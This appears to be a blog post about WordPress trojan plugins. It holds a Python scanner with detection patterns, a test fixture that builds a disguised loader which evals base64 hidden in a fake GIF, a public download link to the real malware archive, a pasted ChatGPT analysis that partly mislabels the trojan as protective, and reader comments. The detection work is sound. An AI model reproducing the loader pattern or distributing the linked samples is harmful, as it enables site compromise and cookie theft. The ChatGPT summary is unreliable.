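    if splits >= 3:
        found.append("split-string-literals")
    if EVAL_VAR.search(joined):
        found.append("eval-of-variable")
    if "base64_decode" in joined and IMAGE_AS_ARG.search(joined):
        found.append("image-file-decoded-as-code")
    m = KEY_CONST.search(joined)
    if m and sorted(m.group(1)) == sorted(B64_ALPHABET * 2):
        found.append("base64-alphabet-permutation-key")  # every alphabet char exactly twice
    return found


def scan_plugins(plugins_dir: Path) -> dict[str, list[str]]:
    """Walk wp-content/plugins and report findings per plugin directory."""
    report = {}
    for plugin in sorted(p for p in plugins_dir.iterdir() if p.is_dir()):
        hits = []
        for f in plugin.rglob("*"):
            if not f.is_file():
                continue
            rel = f.relative_to(plugin).as_posix()
            if f.suffix.lower() in IMAGE_MAGIC and not is_real_image(f):
                hits.append(f"fake-image:{rel}")
            elif f.suffix.lower() == ".php":
                hits += [f"{t}:{rel}" for t in scan_php(f.read_text(errors="replace"))]
        if hits:
            report[plugin.name] = hits
    return report


def build_fixture() -> Path:
    """Constructed tree: one ordinary plugin and one shaped like the samples above."""
    root = Path(tempfile.mkdtemp())
    good = root / "hello-plugin"
    (good / "assets/images").mkdir(parents=True)
    (good / "hello-plugin.php").write_text('<?php add_action("init", "hello_init");')
    (good / "assets/images/logo.png").write_bytes(b"\x89PNG\r\n\x1a\n" + b"\0" * 16)
    bad = root / "qwertyz"                        # constructed name in the style of the real ones
    (bad / "assets/images").mkdir(parents=True)
    php = ('<?php define("k", "%s");\n' % (B64_ALPHABET + B64_ALPHABET[::-1])
           + '$d = base64_decode(strtr(substr(file_get_contents(__DIR__ . "/ass" . "ets/i"'
           ' . "mag" . "es/x." . "gif"), 3), []));\nif ($d) { @eval($d); }')
    (bad / "loader.php").write_text(php)
    (bad / "assets/images/x.gif").write_bytes(b"xxx" + b"this is encoded text, not a GIF")
    return root
```

Run scan_plugins(Path("/path/to/wp-content/plugins")) against a real install; every directory it names deserves a manual look, and a name you never installed is a finding in itself.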
I deleted the files and changed the passwords; that will do for now. There is no good way to trace how these files were planted in the first place. I have packed the trojan files into an archive; anyone interested can download it from the link below. Do not, under any circumstances, install it on your own WP site.
Download: https://www.123pan.com/s/ucY7Vv-v8VHA.html extraction code: 8shq
Appendix: ChatGPT's analysis of the code:
This code is a WordPress plugin whose main functions include:
Preventing malicious access: by checking some parameters of the HTTP request, such as the requested host and the request method, together with some custom algorithms, it decides whether an access is malicious. If a malicious access is detected, it returns an image or performs some other action to prevent further attacks.
Dynamically generating JavaScript code: it reads a file named ezhacap.js and outputs its contents as JavaScript code, which is embedded in the WordPress page.
Handling requests: it processes HTTP request parameters, in particular cookies and POST requests, to execute certain logic. Depending on specific conditions, it may return a particular image, execute some JavaScript code, or perform other operations.
Deleting a specified file: under certain conditions it tries to delete a file named dulishy.png, possibly to clean up temporary files or traces.
Filtering WordPress pages: in the WordPress admin pages it modifies the page list to dynamically remove certain pages.
Generating specific paths: it provides functions such as xikakhi_ithukeq(), zofeber_uvyreha(), fesikhe_suzhage(), izhigyc_omizikh(), uhibifa_fiweqif() and xigohaf_ycavylu() that generate specific path strings.
Base64 encoding and decoding: it provides the yzhalaw_oxahuru() and upeketh_cujowel() functions for custom Base64 encoding and decoding of strings.
Executing remote requests: using cURL or PHP's stream_context_create and file_get_contents functions, it performs remote HTTP requests, fetches the remote server's response, and executes some logic based on that response.
Dynamically loading JavaScript: it outputs a piece of JavaScript code that dynamically loads other JavaScript files.
Other: it also includes further functions and operations, such as alytash_felofuq(), fepanuj_bemucal(), elikhov_ebaniny(), opopoth_lacalur(), mechovy_iqichus(), qyborih_qonugyh(), soshigy_yroxykh(), gifocux_lekhodi(), ociluch_eshynen(), echiveq_pysejam() and so on, which implement the plugin's concrete functional logic.
Please note that this code carries security risks, because it contains the ability to perform remote requests and execute code dynamically, which may lead to potential security problems. Please be very careful when using or analysing this code.
21 comments
Before I moved my site I also found trojans in the site files. I did not dig into them; I just did a full transplant.
A full transplant is one way. Look at the specifics; if that does not work, just do an overwrite install.
During the days you reported it, a thorough check turned up nothing. I did a full transplant too, and MySQL went through a full transplant as well.
But the computer at home still flags it as a virus, so all I can do is whitelist you~~
The most annoying thing about WP is exactly this: more and more files, growing at an alarming rate, and without some technical skill you really cannot tell what they are. A WP site I recently set up ran into a similar problem.
The main thing is that I have no idea where these trojan plugins came from.
That scared me into checking my plugins directory right away; luckily everything is normal.
Yes, it was probably a plugin I uploaded at some point that had a problem. Or a plugin vulnerability was exploited; looks like I will have to keep a regular eye on it.
I no longer like installing plugins; unused plugins and themes all get deleted, since that is where dirt likes to hide.
Looks like images need watching too; using them to hide encrypted code, of all things.
The trojan intercepts cookies; will changing the backend login password protect against it?
WP can log out all logged-in sessions; after changing the password, just log out all logged-in devices.
Still have to change passwords regularly.
Whoever can write plugin code like this is talented too.
I do not understand any of it.
There are plenty of mature solutions for code obfuscation, but deobfuscation is much more troublesome.
The whole point of their obfuscation is to keep you from understanding what it is for.
Impressive, you can even crack the obfuscation. That is how PHP is: upload a .php file and you can change and execute the program. Then there are high-risk functions like eval. Java does not have this problem; Python seems to as well; any scripting language does.
Sure, you know everything.
Advanced stuff, I am completely lost. I only understood the first picture; yep, not bad.
Don't mind those details, hehe.
Brutal, 30 plugins!!!
Not too bad; there were more than forty in total, and I have now deleted all the disabled ones.
People like me who use static frameworks never run into this, so annoying~
Switch quickly and experience it for yourself, otherwise it is not complete~~